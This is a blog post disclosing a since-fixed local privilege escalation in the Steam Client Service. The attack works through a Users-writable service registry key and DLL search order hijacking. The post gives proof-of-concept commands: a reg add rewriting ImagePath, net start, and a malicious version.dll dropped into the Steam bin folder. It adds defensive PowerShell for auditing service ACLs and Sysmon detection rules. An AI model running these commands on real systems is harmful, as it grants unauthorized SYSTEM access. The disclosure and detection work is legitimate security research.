Sunday, August 11, 2019

local privilege escalation via steam client service

0day on steam

Steam Client Service can be started and stopped by a standard user, and the registry key "HKLM\SYSTEM\CurrentControlSet\Services\Steam Client Service" grants Full Control to the Users group. So an attacker can add a registry value under that key to get privileged access.

POC: 
reg add "HKLM\SYSTEM\CurrentControlSet\Services\Steam Client Service" /v ImagePath /d "C:\windows\system32\cmd.exe /c echo pwned > C:\0day.txt"
net start "Steam Client Service"



The default installation path is also writable by the Users group. So version.dll, which Steam Client Service tries to load but which does not exist in that directory, can be hijacked by copying a malicious DLL renamed to version.dll into the Steam installation path (C:\Program Files (x86)\Steam\bin).
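The two preconditions described above, a service registry key writable by Users and a user-writable directory holding the service binary, are exactly what a host audit should look for. The following PowerShell script is an added example written for this page, not code from the post or from Steam: it walks every key under HKLM\SYSTEM\CurrentControlSet\Services, reads ImagePath, and reports any service whose key or binary directory grants write rights to a low-privileged group. The $WeakPrincipals list and the Get-ServiceExecutable helper are assumptions; the rights masks are the standard RegistryRights/FileSystemRights values plus the GENERIC_WRITE/GENERIC_ALL bits that Get-Acl reports numerically.

```powershell
# Added example, not part of the original post: audit every service for the two weaknesses
# described above, (a) a service registry key writable by a low-privileged group and
# (b) a service binary directory writable by such a group (the precondition for dropping
# version.dll next to SteamService.exe). Run from an elevated PowerShell 5.1+ session.
# $WeakPrincipals is an assumption; extend it with groups that matter in your environment.

$WeakPrincipals = @('BUILTIN\Users', 'NT AUTHORITY\Authenticated Users', 'Everyone', 'NT AUTHORITY\INTERACTIVE')

# Rights that let the holder change ImagePath, or drop/replace a file in the binary's directory.
# 0x40000000 / 0x10000000 are GENERIC_WRITE / GENERIC_ALL, which Get-Acl reports as raw numbers.
$RegWriteMask = [int][System.Security.AccessControl.RegistryRights]::SetValue -bor
                [int][System.Security.AccessControl.RegistryRights]::WriteKey -bor
                0x40000000 -bor 0x10000000
$FsWriteMask  = [int][System.Security.AccessControl.FileSystemRights]::Write -bor
                [int][System.Security.AccessControl.FileSystemRights]::Delete -bor
                0x40000000 -bor 0x10000000

function Test-WeakAce {
    # Returns a description of the first Allow ACE that grants a right in $Mask to a weak
    # principal, or $null when there is none. $RightsProperty is 'RegistryRights' or 'FileSystemRights'.
    param($Acl, [int]$Mask, [string]$RightsProperty)
    foreach ($ace in $Acl.Access) {
        if ($ace.AccessControlType -ne 'Allow') { continue }
        if ($WeakPrincipals -notcontains $ace.IdentityReference.Value) { continue }
        if (([int]$ace.$RightsProperty) -band $Mask) {
            return "$($ace.IdentityReference.Value) has $($ace.$RightsProperty)"
        }
    }
    return $null
}

function Get-ServiceExecutable {
    # Extracts the executable path from an ImagePath value (assumed helper): handles quoting,
    # trailing arguments, and the \??\, \SystemRoot\ and bare system32\ forms used by drivers.
    param([string]$ImagePath)
    if ([string]::IsNullOrWhiteSpace($ImagePath)) { return $null }
    $p = [Environment]::ExpandEnvironmentVariables($ImagePath.Trim())
    if ($p.StartsWith('"')) {
        $end = $p.IndexOf('"', 1)
        if ($end -gt 1) { $p = $p.Substring(1, $end - 1) }
    } else {
        $m = [regex]::Match($p, '^(.+?\.(exe|sys))(\s|$)', 'IgnoreCase')
        if ($m.Success) { $p = $m.Groups[1].Value }
    }
    $p = $p -replace '^\\\?\?\\', '' -replace '^\\SystemRoot', $env:SystemRoot
    if ($p -match '^system32\\') { $p = Join-Path $env:SystemRoot $p }
    return $p
}

function Get-WeakServiceAcl {
    foreach ($key in Get-ChildItem 'HKLM:\SYSTEM\CurrentControlSet\Services' -ErrorAction SilentlyContinue) {
        $regWeak = $dirWeak = $null
        # (a) who may rewrite this service's configuration, ImagePath included
        try { $regWeak = Test-WeakAce (Get-Acl -Path $key.PSPath -ErrorAction Stop) $RegWriteMask 'RegistryRights' } catch { }
        # (b) who may drop a DLL next to the service binary
        $imagePath = (Get-ItemProperty -Path $key.PSPath -Name ImagePath -ErrorAction SilentlyContinue).ImagePath
        $exe = Get-ServiceExecutable $imagePath
        if ($exe -and (Test-Path -LiteralPath $exe)) {
            $dir = Split-Path -Parent $exe
            try { $dirWeak = Test-WeakAce (Get-Acl -LiteralPath $dir -ErrorAction Stop) $FsWriteMask 'FileSystemRights' } catch { }
        }
        if ($regWeak -or $dirWeak) {
            [pscustomobject]@{ Service = $key.PSChildName; ImagePath = $imagePath
                               WeakRegistryAce = $regWeak; WeakDirectoryAce = $dirWeak }
        }
    }
}

Get-WeakServiceAcl | Format-Table -AutoSize
```

On an installation with the permissions the post describes, the output would list Steam Client Service with both columns filled: BUILTIN\Users with FullControl on the key, and a write ACE on the bin directory. Two caveats: the check matches principal names directly and does not resolve nested group membership, and it counts inherit-only ACEs the same as effective ones, so each hit should be confirmed with icacls or Get-Acl on the specific object before filing it.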



Dll Search Order Hijacking



In Process Monitor, the load of version.dll shows NAME NOT FOUND. So copy the malicious DLL into the installation bin path, renamed to version.dll, and set the ImagePath registry value back to "C:\Program Files (x86)\Steam\bin\SteamService.exe /RunAsService".

POC: 
copy C:\testbin\malicious.dll version.dll
reg add "HKLM\SYSTEM\CurrentControlSet\Services\Steam Client Service" /v ImagePath /d "\"C:\Program Files (x86)\Steam\bin\SteamService.exe\" /RunAsService"
net start "Steam Client Service"



Rollback:
C:\Program Files (x86)\Common Files\Steam>SteamService.exe /repair && SteamService.exe /install
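Both steps of the chain above leave distinct traces: the reg add is a registry SetValue on a service's ImagePath by a non-service account, and the hijack is the service binary loading version.dll from its own directory instead of System32. The following PowerShell is an added detection example written for this page, not code from the post or from Steam. It runs two rules over constructed Sysmon-shaped records (Event ID 13 RegistryEvent and Event ID 7 ImageLoaded); the user names, times, host name and the Event/EventData subset in the samples are placeholders, and in production the records would come from Get-WinEvent on the Microsoft-Windows-Sysmon/Operational log.

```powershell
# Added example, not part of the original post: detection logic for both steps of the
# chain described above, run over constructed Sysmon-shaped records.
#   Rule 1: Sysmon Event ID 13 (RegistryEvent SetValue) on a service's ImagePath value
#           by any account other than the built-in service accounts.
#   Rule 2: Sysmon Event ID 7 (ImageLoaded) of a DLL that belongs in the Windows directory
#           (version.dll here) but was loaded from somewhere else.
# Real records come from Get-WinEvent -LogName 'Microsoft-Windows-Sysmon/Operational'; the
# samples keep only the fields the rules use, and their users, times and paths are placeholders.

$ServiceAccounts = @('NT AUTHORITY\SYSTEM', 'NT AUTHORITY\LOCAL SERVICE', 'NT AUTHORITY\NETWORK SERVICE')
$SystemDllNames  = @('version.dll')   # extend with other DLLs that must only come from the Windows directory
$WindowsDir      = if ($env:SystemRoot) { $env:SystemRoot } else { 'C:\Windows' }

# Constructed records: a user-level ImagePath write, a SYSTEM-level one, a version.dll load
# from the Steam bin directory, and a normal version.dll load from System32.
$SampleRecords = @(
@'
<Event><System><EventID>13</EventID></System><EventData>
<Data Name="UtcTime">2019-08-11 09:00:01.000</Data><Data Name="Image">C:\Windows\System32\reg.exe</Data>
<Data Name="User">DESKTOP-EXAMPLE\lowpriv</Data>
<Data Name="TargetObject">HKLM\System\CurrentControlSet\Services\Steam Client Service\ImagePath</Data>
<Data Name="Details">C:\windows\system32\cmd.exe /c echo pwned > C:\0day.txt</Data></EventData></Event>
'@,
@'
<Event><System><EventID>13</EventID></System><EventData>
<Data Name="UtcTime">2019-08-11 09:05:00.000</Data><Data Name="Image">C:\Windows\System32\services.exe</Data>
<Data Name="User">NT AUTHORITY\SYSTEM</Data>
<Data Name="TargetObject">HKLM\System\CurrentControlSet\Services\Steam Client Service\ImagePath</Data>
<Data Name="Details">"C:\Program Files (x86)\Steam\bin\SteamService.exe" /RunAsService</Data></EventData></Event>
'@,
@'
<Event><System><EventID>7</EventID></System><EventData>
<Data Name="UtcTime">2019-08-11 09:10:00.000</Data><Data Name="User">NT AUTHORITY\SYSTEM</Data>
<Data Name="Image">C:\Program Files (x86)\Steam\bin\SteamService.exe</Data>
<Data Name="ImageLoaded">C:\Program Files (x86)\Steam\bin\version.dll</Data></EventData></Event>
'@,
@'
<Event><System><EventID>7</EventID></System><EventData>
<Data Name="UtcTime">2019-08-11 09:10:00.100</Data><Data Name="User">NT AUTHORITY\SYSTEM</Data>
<Data Name="Image">C:\Program Files (x86)\Steam\bin\SteamService.exe</Data>
<Data Name="ImageLoaded">C:\Windows\System32\version.dll</Data></EventData></Event>
'@
)

function ConvertFrom-SysmonRecord {
    # Flattens one Sysmon event XML into a hashtable keyed by EventData field name.
    param([string]$Xml)
    $doc = [xml]$Xml
    $ev = @{ EventID = [int]$doc.Event.System.EventID }
    foreach ($d in $doc.Event.EventData.Data) { $ev[$d.GetAttribute('Name')] = $d.InnerText }
    return $ev
}

function Test-ServiceImagePathWriteByUser {
    param([hashtable]$Ev)
    return ($Ev.EventID -eq 13 -and
            $Ev.TargetObject -match '^HKLM\\System\\CurrentControlSet\\Services\\[^\\]+\\ImagePath$' -and
            $Ev.User -notin $ServiceAccounts)
}

function Test-SystemDllLoadedOutsideWindows {
    param([hashtable]$Ev)
    if ($Ev.EventID -ne 7 -or -not $Ev.ImageLoaded) { return $false }
    $leaf = Split-Path -Leaf $Ev.ImageLoaded
    return ($leaf -in $SystemDllNames -and $Ev.ImageLoaded -notlike "$WindowsDir\*")
}

function Find-ServiceHijackIndicators {
    param([string[]]$Records)
    foreach ($r in $Records) {
        $ev = ConvertFrom-SysmonRecord $r
        if (Test-ServiceImagePathWriteByUser $ev) {
            [pscustomobject]@{ Rule = 'ServiceImagePathWriteByUser'; Time = $ev.UtcTime; User = $ev.User
                               Image = $ev.Image; Detail = "$($ev.TargetObject) = $($ev.Details)" }
        } elseif (Test-SystemDllLoadedOutsideWindows $ev) {
            [pscustomobject]@{ Rule = 'SystemDllLoadedOutsideWindows'; Time = $ev.UtcTime; User = $ev.User
                               Image = $ev.Image; Detail = $ev.ImageLoaded }
        }
    }
}

Find-ServiceHijackIndicators -Records $SampleRecords | Format-Table -AutoSize
```

Run against the samples, the first and third records are flagged and the two SYSTEM-originated ones are not. Rule 1 will also fire on installers and administrators editing services interactively, so triage on the Image and Details columns rather than suppressing it; Rule 2 depends on Sysmon being configured to log ImageLoaded events, which many default configurations filter heavily.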


B00M !!! Steam gamers' hell come !!!

Update: they have since released a fix.



Ref:
https://attack.mitre.org/techniques/T1058/ (Service Registry Permissions Weakness)
https://attack.mitre.org/techniques/T1038/ (DLL Search Order Hijacking)


